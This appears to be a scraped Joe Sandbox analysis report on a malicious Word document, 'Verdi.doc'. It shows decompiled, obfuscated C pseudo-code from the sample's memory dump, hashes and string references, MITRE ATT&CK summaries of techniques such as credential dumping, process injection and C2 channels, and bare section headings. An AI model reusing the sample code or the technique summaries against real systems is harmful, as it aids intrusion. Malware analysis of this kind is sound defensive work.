				_t115 = _t114 + 1;
				 *(__ebx + 0x403498) = 0x68e4;
				 *(__ebx + 0x40349c) =  *(__ebx + 0x40349c) - 1;
				 *(__ebx + 0x40349c) =  *(__ebx + 0x40349c) ^ 0x00008b20;
				_v8 = 0x879c;
				_a4 = _t115;
				_v8 = _v8 - 0x1015;
				_v8 = _v8 | 0x3443;
				_a8 = _a8 & _t115 + 0x00000001;
				return _t107 - 1 + 1;
			}

0x004cb8ab
0x004cb8b7
0x004cb8ba
0x004cb8c8
0x004cb8d4
0x004cb8da
0x004cb8e0
0x004cb8f3
0x004cb8fd
0x004cb90b
0x004cb911
0x004cb91a
0x004cb926
0x004cb936
0x004cb93d
0x004cb947
0x004cb952
0x004cb958
0x004cb960
0x004cb963
0x004cb980
0x004cb983
0x004cb98c
0x004cb997
0x004cb9a7
0x004cb9ac
0x004cb9b2
0x004cb9bb
0x004cb9c5
0x004cb9c8
0x004cb9ca
0x004cb9d7
0x004cb9de
0x004cb9ef
0x004cba00
0x004cba04
0x004cba0b
0x004cba19
0x004cba24

Strings

h, xrefs: 004CB9CA
fX, xrefs: 004CB8C8
gD, xrefs: 004CB9F6
6O, xrefs: 004CB8E0

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: 6O$fX$gD$h
API String ID: 0-143669592
Opcode ID: 1876c3404e588e4e999fb0f2e010b44f82ca94b6015a558e57b28a376f1215a8
Instruction ID: 91f2c49051ee649255c0249cce9713572c036d4f7275384b48435ddf4ca81cc0
Opcode Fuzzy Hash: 1876c3404e588e4e999fb0f2e010b44f82ca94b6015a558e57b28a376f1215a8
Instruction Fuzzy Hash: 3B414D72C10604EBFB05CF65C64A29A7BB4EF4132AF24C16A9C0CAE186D77C8B149F54

Uniqueness

Uniqueness Score: 100.00%

Function 004C5366, Relevance: 5.1, Strings: 4, Instructions: 97
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E004C5366(void* __eax, void* __ebx, intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _t84;
				signed int _t97;
				signed int _t105;
				void* _t107;
				signed int _t115;
				signed int _t116;

				_t84 = __eax + 0x6586;
				 *(__ebx + 0x4033f0) =  *(__ebx + 0x4033f0) + 1;
				 *(__ebx + 0x4033f0) =  *(__ebx + 0x4033f0) ^ _t84;
				 *(__ebx + 0x4033f4) = 0x22f4;
				 *(__ebx + 0x4033f4) =  *(__ebx + 0x4033f4) + 1;
				_v12 = _v12 - (_t107 + 0x0000485b ^ 0x00000000);
				 *(__ebx + 0x4033f4) =  *(__ebx + 0x4033f4) + 0xfbc0;
				 *(__ebx + 0x4033f0) =  *(__ebx + 0x4033f0) ^ 0x0000c911;
				 *(__ebx + 0x4033f0) =  *(__ebx + 0x4033f0) - 1;
				_a12 = _a12 + 0xdaa4;
				_t116 = _t115 & 0x00005c91;
				_v16 = _v16 + 0xf3d9;
				 *(__ebx + 0x4033f4) = 0x2232;
				_v12 = _v12 & 0x00004e26;
				 *(__ebx + 0x4033f4) =  *(__ebx + 0x4033f4) | (((_t84 ^ 0x8b68) - 0x0000d198 |  *(__ebx + 0x4033f4)) - 0xffffffffffff1173 + 0x0000262c ^ _t116) - 0x000033cd + 0xe100;
				 *(__ebx + 0x4033f4) =  *(__ebx + 0x4033f4) & 0x00000000;
				 *(__ebx + 0x4033f0) = 0x3611;
				_t97 = E004C29E6((((_t84 ^ 0x8b68) - 0x0000d198 |  *(__ebx + 0x4033f4)) - 0xffffffffffff1173 + 0x0000262c ^ _t116) - 0x33cd + 0x1de7d, __ebx,  *((intOrPtr*)(__ebx + 0x4038e8)));
				_v12 = _v12 - 1;
				 *(__ebx + 0x4033f0) =  *(__ebx + 0x4033f0) ^ _t97;
				_a4 = 0x6857;
				_v16 = _v16 + 1;
				_a12 = _a12 & 0x0000d348;
				_v8 = 0x97bc;
				 *(__ebx + 0x4033f4) =  *(__ebx + 0x4033f4) ^ 0x00000000;
				_a8 = _a8 + 0x4eec;
				_a8 = _a8 | 0x0000cc42;
				_v8 = 0xc5fb;
				_v12 = _v12 - 0xddc5;
				_t105 = (_t97 + 0x00000001 -  *(__ebx + 0x4033f4) - 0x00002d93 & 0x8400) + 0x16ddf;
				 *(__ebx + 0x4033f0) =  *(__ebx + 0x4033f0) - 1;
				_v12 = _v12 ^ _t105;
				_v12 = _v12 + ((0 & _v8) + _a8 + 0x00000001 | _t116 + 0x00000001);
				_a12 = _a12 + 1;
				return _t105;
			}

0x004c5371
0x004c5377
0x004c5387
0x004c538d
0x004c5397
0x004c53a7
0x004c53b5
0x004c53ce
0x004c53d8
0x004c53f7
0x004c5412
0x004c541b
0x004c5422
0x004c5433
0x004c5447
0x004c544d
0x004c5454
0x004c546b
0x004c5470
0x004c5473
0x004c547c
0x004c5487
0x004c548b
0x004c5492
0x004c54a0
0x004c54a7
0x004c54c1
0x004c54d3
0x004c54e6
0x004c54ed
0x004c54ee
0x004c54f4
0x004c54f7
0x004c54ff
0x004c5508

Strings

2", xrefs: 004C5422
qO, xrefs: 004C5499
Wh, xrefs: 004C547C
N, xrefs: 004C54A7

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: 2"$Wh$qO$N
API String ID: 0-1796262710
Opcode ID: 14666c6c997fac4cd06e03496d56f414148e58529b77bc81abc8e40b4f8f442a
Instruction ID: 7befb48b5529546f9ffa2a3e2641003896b406fa61ce4e421a19352eb4a8bbf6
Opcode Fuzzy Hash: 14666c6c997fac4cd06e03496d56f414148e58529b77bc81abc8e40b4f8f442a
Instruction Fuzzy Hash: 0E4196728102069FFB08CF65C9CA79E7BB4FF10316F59816EAC19A9186C7BC4724AB54

Uniqueness

Uniqueness Score: 100.00%

Description:	Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items . This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, `/Library/StartupItems` isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), `StartupParameters.plist` , reside in the top-level directory.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion, Persistence
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP . Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control, Lateral Movement
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Verdi.doc

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Cryptography:

Spreading:

Software Vulnerabilities:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static OLE Info

General

OLE File "word/vbaProject.bin"

Indicators

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 7919

General

VBA Code Keywords

VBA Code

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre